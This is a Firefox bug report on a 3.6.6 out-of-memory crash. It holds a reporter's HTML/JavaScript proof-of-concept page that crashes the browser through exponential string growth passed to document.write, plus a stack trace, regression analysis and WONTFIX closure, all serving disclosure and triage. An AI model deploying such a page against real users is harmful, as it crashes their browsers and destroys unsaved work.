Closed Bug 575263 Opened 14 years ago Closed 6 years ago

Denial of Service in Firefox 3.6.6 - oom [@ _CxxThrowException | operator new | TextRunWordCache::MakeTextRun]

Categories

(Core :: Layout: Text and Fonts, defect)

1.9.2 Branch
defect
Not set
major

Tracking

RESOLVED WONTFIX
Tracking Status
status2.0 --- unaffected
status1.9.2 --- wanted

People

(Reporter: r45c4l, Unassigned)

References

Details

(Keywords: crash, Whiteboard: [sg:dos OOM] maybe fixed by 565373)

Attachments

(1 file)

User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6

[ EXPL0!T ]
<html>
<head>
<title>Mozilla Firefox 3.6.6 Denial of Service by r45c4l </title>
<script>
// Each iteration does buff += buff + "A", so buff holds 2^(i+2)-1
// characters after iteration i, and document.write() then receives
// twice that. Memory use grows exponentially; the loop bound of 786
// is never reached because the browser runs out of memory first.
function junk()
{
  var buff = "A";
  var i;
  for (i = 0; i < 786; i++)
  {
    buff += buff + "A";
    document.write(buff + buff);
  }
}
</script>
</head>
<body onload="junk();">
<font color="green">r45c4l<font color="red">[AT]</font>hotmail<font color="green">[DOT]</font>com</font>
</body>
</html>


Save the page as [dot]html and open it with Firefox 3.6.6. The browser will hang and then crash.


Reproducible: Always

Actual Results:  
Browser hangs and crashes
No crash on - Mozilla/5.0 (Windows; U; Windows NT 6.1; WOW64; en-US; rv:1.9.3a6pre) Gecko/20100628 Minefield/3.7a6pre

Crash - Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6
Severity: normal → major
Attached file WinDbg Stacktrace
blocking1.9.2: --- → ?
Crashes Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6 as well
OS: Windows 7 → All
Hardware: x86 → All
Attachment #454514 - Attachment mime type: application/octet-stream → text/plain
_CxxThrowException
operator new(unsigned int size = 0x692a2c0c)
TextRunWordCache::MakeTextRun(0x00000003, aLength = 0xfffffc6, 0x0a6d4240, 0x0036b548, 0x1000120)+0x91 [e:\builds\moz2_slave\win32_build\build\gfx\thebes\src\gfxtextrunwordcache.cpp @ 707]
MakeTextRun(0x693039ec, 0x36da30, aFontGroup = 0x00000003, 0x0a6dc720, 0)
BuildTextRunsScanner::BuildTextRunForFrames
BuildTextRunsScanner::FlushFrames
BuildTextRuns
_cairo_array_grow_by
USP10!ApplyFeatures+0x645
gfxTextRun::Draw
nsHTMLReflowState::InitConstraints
nsContainerFrame::ReflowChild
CanvasFrame::Reflow
nsContainerFrame::ReflowChild
nsHTMLScrollFrame::ReflowScrolledFrame
nsHTMLScrollFrame::ReflowContents
nsHTMLScrollFrame::Reflow
nsContainerFrame::ReflowChild
ViewportFrame::Reflow
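Why the page falls over long before i reaches 786: the following is an added example, not part of the bug report or the reporter's PoC, that models the growth of buff arithmetically with BigInt instead of allocating it. The 0x0fffffc6 value in the usage lines is the aLength argument of TextRunWordCache::MakeTextRun from the WinDbg trace above; the 2^30-2 string cap is an assumed engine limit used only for illustration, not a value the bug states for any Firefox version.

```javascript
// Added example, not from the bug report: model the PoC's string growth
// without allocating it. Every iteration does buff += buff + "A" and then
// document.write(buff + buff), so after iteration i (0-based) buff holds
// 2^(i+2)-1 characters and the write hands layout 2^(i+3)-2 characters.
// BigInt is used because 2^789 overflows a double.
const POC_ITERATIONS = 786; // loop bound in the reporter's PoC

// One row per iteration: length of buff, length passed to document.write,
// and total characters written so far.
function growthTable(iterations = POC_ITERATIONS) {
  const rows = [];
  let buff = 1n;        // "A"
  let written = 0n;
  for (let i = 0; i < iterations; i++) {
    buff = 2n * buff + 1n;          // buff += buff + "A"
    const write = 2n * buff;        // document.write(buff + buff)
    written += write;
    rows.push({ iteration: i, buffLength: buff, writeLength: write, totalWritten: written });
  }
  return rows;
}

// First iteration whose buff + buff reaches `limit` characters, or -1.
// Used below both for the text-run size seen in the trace and for an
// engine's maximum string length, which is what a concatenation-based PoC
// hits first once the engine enforces one.
function firstIterationReaching(limit, iterations = POC_ITERATIONS) {
  for (const row of growthTable(iterations)) {
    if (row.writeLength >= limit) return row.iteration;
  }
  return -1;
}

// Length buff would have if the loop actually ran to completion.
function nominalFinalLength(iterations = POC_ITERATIONS) {
  return 2n ** (BigInt(iterations) + 1n) - 1n;
}

// Usage: relate the model to the WinDbg trace and to a string-length cap.
const TRACE_TEXTRUN_LENGTH = 0x0fffffc6n;   // aLength from MakeTextRun in the trace
const ASSUMED_STRING_CAP = 2n ** 30n - 2n;  // assumed engine limit, for illustration only
const hitTrace = firstIterationReaching(TRACE_TEXTRUN_LENGTH);
const hitCap = firstIterationReaching(ASSUMED_STRING_CAP);
console.log(`a single document.write() of >= 0x0fffffc6 characters first happens at iteration ${hitTrace}`);
console.log(`buff + buff would exceed the assumed string cap at iteration ${hitCap}`);
console.log(`buff after ${POC_ITERATIONS} iterations would be ${nominalFinalLength().toString(2).length} bits long`);
```

The two numbers worth noting: a single document.write() already hands layout a text run of the size in the trace at iteration 25, so the 786 bound in the PoC is decorative, and an engine cap on string length of the kind asked about later in this bug turns the same loop into a RangeError at concatenation time in current engines, before the DOM or the text-run cache ever sees the data.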
Component: General → Layout: Text
Keywords: crash
Product: Firefox → Core
QA Contact: general → layout.fonts-and-text
Summary: Denial of Service in Firefox 3.6.6 → Denial of Service in Firefox 3.6.6 - oom [@ _CxxThrowException | operator new | TextRunWordCache::MakeTextRun]
Version: unspecified → 1.9.2 Branch
Did a regression range on this issue. The Tracemonkey build from May 17th shows the issue; the May 18th build no longer crashes or hangs. The Mozilla Central build from the 18th hangs, meaning that this was fixed on Tracemonkey first.

http://hg.mozilla.org/tracemonkey/pushloghtml?fromchange=e5ae28ee811b&tochange=955bfaadaebb

This range has two bugs:
bug 565229 - Bulk clear GC bitmaps when GC starts instead of after the GC ends 
bug 565373 - Fix recursing with inlining 

I suspect the second is the bug that fixed the issue.
Status: UNCONFIRMED → NEW
Ever confirmed: true
blocking1.9.2: ? → .8+
Depends on: 565373
Whiteboard: [sg:dos OOM] fixed by 565373
No longer depends on: 565373
Depends on: 565373
I'm not sure 565373 is the fix since that appeared to be fixing a trunk regression after 3.6 branched. But we can try the patch, maybe the regression range is incorrect.
Whiteboard: [sg:dos OOM] fixed by 565373 → [sg:dos OOM] maybe fixed by 565373
Assignee: nobody → sayrer
sayrer, can you see if the fix for bug 565373 fixes this on a branch? I'll try to check it locally as well, but you'd need to be involved anyway to land if it does fix it.
(In reply to comment #7)
> sayrer, can you see if the fix for bug 565373 fixes this on a branch? I'll try
> to check it locally as well, but you'd need to be involved anyway to land if it
> does fix it.

Is this comment in the right bug?
Yes. This bug is not an issue on trunk as it was fixed in TM which later merged into m-c, and the fix range points to bug 565373 (see comment 5). We'd like bug 565373 backported to the branches if it a) actually fixes this bug's issue and b) is fairly safe.

I'm looking to patch 1.9.2.9 default now with the fix from bug 565373 and test it locally, to make sure the page in comment 1 doesn't cause a crash anymore. I wouldn't be the guy to integrate or determine if we should actually take that on the branch(es) though, which is why I looped you in. If this should go to someone else, let me know.
...and I just realized we are already tracking bug 565373, so this should probably be closed in favor of doing everything in bug 565373 (once it is determined that this is indeed a dupe of bug 565373).
Assignee: sayrer → abillings
Al, I may not have time to get to this. If you have time, can you do a local build with the fix from bug 565373 to see if this should be duped off?

Thanks!
My HG-fu is weak. While I build debug builds, in general, for testing, I don't know enough HG to know how to pull the patch from bug 565373 and merge it into my local repo. If someone wants to give me simple instructions on how to do it, I can build an optimized build on Windows for this.
Hmmm, doesn't look like there is a js/src/jsrecursion.cpp in 1.9.2...
blocking1.9.2: .9+ → ---
Assignee: abillings → nobody
Didn't we add a limit on JS string length? Was that on trunk or in 1.9.2 already?
Crash Signature: [@ _CxxThrowException | operator new | TextRunWordCache::MakeTextRun]
Closing because no crash has been reported in 12 weeks.
Status: NEW → RESOLVED
Closed: 6 years ago
Resolution: --- → WONTFIX